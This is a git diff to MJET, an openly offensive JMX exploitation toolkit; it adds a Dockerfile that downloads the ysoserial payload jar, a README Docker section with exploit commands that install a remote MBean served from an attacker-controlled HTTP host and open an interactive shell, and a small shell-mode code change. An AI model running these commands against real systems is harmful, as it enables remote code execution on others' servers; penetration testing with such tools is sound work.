diff --git a/Dockerfile b/Dockerfile index 4a227df..e5c63f2 100644 --- a/Dockerfile +++ b/Dockerfile @@ -1,9 +1,10 @@ -FROM ubuntu:latest +FROM openjdk:8-alpine ENV TZ=Europe/Stockholm RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone -RUN apt-get update && apt-get install -y jython wget git && rm -rf /var/lib/apt/lists/* COPY . /app -RUN wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar -O /app/jars/ysoserial.jar +RUN wget "http://search.maven.org/remotecontent?filepath=org/python/jython-standalone/2.7.0/jython-standalone-2.7.0.jar" -O app/jython-standalone-2.7.0.jar \ + && wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar -O /app/jars/ysoserial.jar EXPOSE 8000 WORKDIR /app -ENTRYPOINT ["jython", "mjet.py"] +ENTRYPOINT ["java", "-jar", "jython-standalone-2.7.0.jar", "mjet.py"] +CMD ["-h"] diff --git a/README.md b/README.md index e397ba1..7786474 100644 --- a/README.md +++ b/README.md @@ -4,10 +4,13 @@ MOGWAI LABS JMX Exploitation Toolkit MJET is a fork of [sjet](https://github.com/siberas/sjet/), which was developed by siberas but is no longer actively maintained. MJET is maintained by the MOGWAI LABS team which also provided most of the original sjet codebase. - MJET allows an easy exploitation of insecure configured JMX services. Additional background information can be found [here](https://www.optiv.com/blog/exploiting-jmx-rmi) and [here](https://www.owasp.org/images/c/c1/JMX_-_Java_Management_Extensions_-_Hans-Martin_Muench.pdf). +## !!! Important: This project is no longer maintained +This repository is **no longer activly maintained**. We recommend using [qtcs beanshooter](https://github.com/qtc-de/beanshooter) instead. + + ## Prerequisites * [Jython 2.7](https://www.jython.org/) @@ -19,7 +22,7 @@ information can be found [here](https://www.optiv.com/blog/exploiting-jmx-rmi) a MJET implements a CLI interface (using [argparse](https://docs.python.org/3/library/argparse.html)): ``` -jython mjet.py targetHost targetPort password MODE (modeOptions) +jython mjet.py targetHost targetPort MODE password (modeOptions) ``` Where @@ -97,7 +100,7 @@ h0ng10@rocksteady ~/w/mjet> Installation with JMX credentials (also needs a weak configuration of the server): ``` -h0ng10@rocksteady:~/mjet$ jython mjet.py 192.168.11.136 9991 super_secret install http://192.168.11.132:8000 8000 --jmxrole JMXUSER --jmxpassword JMXPASSWORD +h0ng10@rocksteady:~/mjet$ jython mjet.py 192.168.11.136 9991 install super_secret http://192.168.11.132:8000 8000 --jmxrole JMXUSER --jmxpassword JMXPASSWORD mJET - MOGWAI LABS JMX Exploitation Toolkit ======================================= [+] Starting webserver at port 8000 @@ -412,6 +415,23 @@ $ Reference: https://www.optiv.com/blog/exploiting-jmx-rmi +### Docker + +Build and run the docker image + +```bash +# Build +docker build -t mjet . +# Run Help +docker run mjet +# Exploit example +docker run mjet 10.165.188.23 2222 install super_secret http://10.165.188.1:8000 8000 +# Run Interactive into shell +docker run --entrypoint /bin/sh -it mjet +``` + +By default the docker image exposes port 8000 for the HTTP server. If you need another port you need to remember to expose it! + ## Contributing Feel free to contribute. @@ -424,6 +444,8 @@ Feel free to contribute. * **Arnim Rupp** - *Authentication support* * **Sebastian Kindler** - *Deserialization support* * **Karsten Zeides** - *JMX Message Protocol support, localhost bypass* [zeides](https://github.com/zeides) +* **g60ocR** - *Docker file* [g60ocR](https://github.com/g60ocR) +* **Morn98** - *Shell and RMI selection* [Morn98](https://github.com/Morn98)) See also the list of [contributors](https://github.com/mogwailabs/sjet/graphs/contributors) who participated in this project. diff --git a/mjet.py b/mjet.py index e157b69..d3b4a98 100644 --- a/mjet.py +++ b/mjet.py @@ -380,7 +380,7 @@ def startShell(password, bean_server): if cmd == 'exit_shell': in_command_loop = False else: - executeCommand(password, cmd, bean_server) + executeCommand(password, cmd, bean_server, args.shell) ### /SHELL MODE ###